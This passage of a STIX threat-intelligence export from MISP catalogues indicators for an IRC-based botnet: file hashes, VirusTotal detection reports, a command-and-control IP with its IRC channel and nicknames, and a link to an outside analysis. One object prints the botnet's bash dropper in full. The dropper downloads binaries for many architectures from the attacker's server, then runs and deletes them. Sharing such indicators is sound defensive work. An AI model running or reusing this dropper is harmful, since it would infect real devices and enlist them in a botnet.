"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-58f0-4fff-810e-472d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-a4c8-4691-8b09-443902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-31dc-4d16-b61e-4b6502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T09:03:03.000Z",
|
|
|
|
"modified": "2019-04-27T09:03:03.000Z",
|
|
|
|
"first_observed": "2019-04-27T09:03:03Z",
|
|
|
|
"last_observed": "2019-04-27T09:03:03Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
"value": "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:42:22.000Z",
|
|
|
|
"modified": "2019-04-27T08:42:22.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = '82062b666f09fc5c0fe4f68d1ea90916' AND file:hashes.SHA1 = 'b35d4b7980d361874e84e76eddbaff83c2c5790f' AND file:hashes.SHA256 = '49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:42:22Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:20:12.000Z",
|
|
|
|
"modified": "2019-04-27T08:20:12.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2018-12-21T07:40:44",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "4bef3161-25cf-4364-bcef-432bc49c6834"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0/analysis/1545378044/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "73e29dd1-c3dd-40bd-91e1-660a20460fe9"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "26/57",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "cbd0000d-8368-430e-85e0-7c2cd4871b09"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:21:55.000Z",
|
|
|
|
"modified": "2019-04-27T08:21:55.000Z",
|
|
|
|
"pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.244.25.235') AND network-traffic:dst_port = '80']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:21:55Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "network"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"ip-port\"",
|
|
|
|
"misp:meta-category=\"network\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:55:30.000Z",
|
|
|
|
"modified": "2019-04-27T08:55:30.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"irc\"",
|
|
|
|
"misp:meta-category=\"network\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "nickname",
|
|
|
|
"value": "AmpAttacks",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "5cc4152c-470c-4c48-b864-48d302de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "ip-dst",
|
|
|
|
"object_relation": "ip",
|
|
|
|
"value": "185.244.25.235",
|
|
|
|
"category": "Network activity",
|
|
|
|
"to_ids": true,
|
|
|
|
"uuid": "5cc4152c-86c0-4511-bc5f-450902de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "channel",
|
|
|
|
"value": "Summit",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "5cc4152c-bd1c-4174-94ba-4c7202de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "port",
|
|
|
|
"object_relation": "dst-port",
|
|
|
|
"value": "6667",
|
|
|
|
"category": "Network activity",
|
|
|
|
"uuid": "5cc4152c-6de0-4f8b-8e6f-4d1d02de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "nickname",
|
|
|
|
"value": "[x86_64|BWQLXKB]",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "5cc41660-2350-47b7-8703-4df902de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "nickname",
|
|
|
|
"value": "[MIPS|WGEQAV]",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "5cc41660-a6c4-4736-a284-4b7902de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "nickname",
|
|
|
|
"value": "[ARM4T|PCVREB]",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "5cc41660-b8d8-4c08-a98b-4c3002de0b81"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "network",
|
|
|
|
"x_misp_name": "irc"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "malware",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "malware--5cc417e0-af4c-4df0-974b-4cd102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:50:40.000Z",
|
|
|
|
"modified": "2019-04-27T08:50:40.000Z",
|
|
|
|
"name": "sh",
|
|
|
|
"is_family": false,
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "misc"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"implementation_languages": [
|
|
|
|
"Bash"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"script\"",
|
|
|
|
"misp:meta-category=\"misc\"",
|
|
|
|
"misp:to_ids=\"False\""
|
|
|
|
],
|
|
|
|
"x_misp_script": "#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; rm -rf mips\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -rf sh4\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -rf x86\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; rm -rf i686\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; rm -rf i586\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; rm -rf m68k\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc; rm -rf sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp; rm -rf 440fp",
|
|
|
|
"x_misp_state": "Malicious"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:32.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:32.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = '1cc9232302cb7569dc6dcd76fe5d7c48' AND file:hashes.SHA1 = '3c24b5150afbcfc8b5b98740329e279c778acfec' AND file:hashes.SHA256 = '284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:32Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:32.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:32.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-07T05:10:51",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "c979bfbb-fa6b-435e-a994-2212c5b430ee"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a/analysis/1554613851/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "4db99dd0-83ff-456e-9796-816f83b2c265"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "35/55",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "dcffe0ba-339e-4ab0-b00d-729db80d1bf5"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'e49d17afc76617a6b2a445ef21342454' AND file:hashes.SHA1 = '5d223085ca23494fd18622e6bc6d81b6f8eaa8a8' AND file:hashes.SHA256 = '3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-14T04:40:19",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "4c0b0672-508b-41f5-8ff0-6b13ee76b5c5"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc/analysis/1555216819/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "1c60fb0a-aa1f-4dbc-a9ab-dc741863af4a"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "37/57",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "c5d88b4d-d908-4ecd-bcb1-bccf7e878a70"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = '30097dc12f07b9d44fd4bb32ea30cd4e' AND file:hashes.SHA1 = '4f2350b20810ad45d40036c12d23239df1e3eaad' AND file:hashes.SHA256 = '32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-06T09:09:47",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "16887f29-8d0c-46bd-a5ba-43b819d1b5f3"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3/analysis/1554541787/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "08a55fac-9627-496d-b5f1-d2fff1469956"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "35/56",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "1ad4c142-b928-4b40-954b-ed89873761fa"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = '5a56f0b53d7639c3775b41de95b4902e' AND file:hashes.SHA1 = '18f0a1a2f448d2a5824566a080b32f5d5f291075' AND file:hashes.SHA256 = '34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-14T04:38:58",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "28219f45-de8f-443f-95ea-f953b32ab42c"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe/analysis/1555216738/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "9e8d82d4-4886-40e5-b15c-c1f75bb6e0ad"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "36/57",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "eb4ad240-1687-479f-9ae9-55f16edf0601"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = '3a3f7b2c2bea6a70ad62657b8613b1d1' AND file:hashes.SHA1 = 'ca94cde61c2b1640a420c61d2cb9c892b81a30d1' AND file:hashes.SHA256 = '976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-07T17:10:08",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "605f81fb-6364-412b-a106-39603b9c4e59"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c/analysis/1554657008/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "5990199c-faff-4903-808a-bdbba9f7276a"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "36/56",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "f678d42e-bf7a-46c0-af36-7e8b82a6f280"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'fad9b9a909688f800606c2148b4d0880' AND file:hashes.SHA1 = 'ee44b722df537d53a3e59db178e2be57d7f8e985' AND file:hashes.SHA256 = '62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
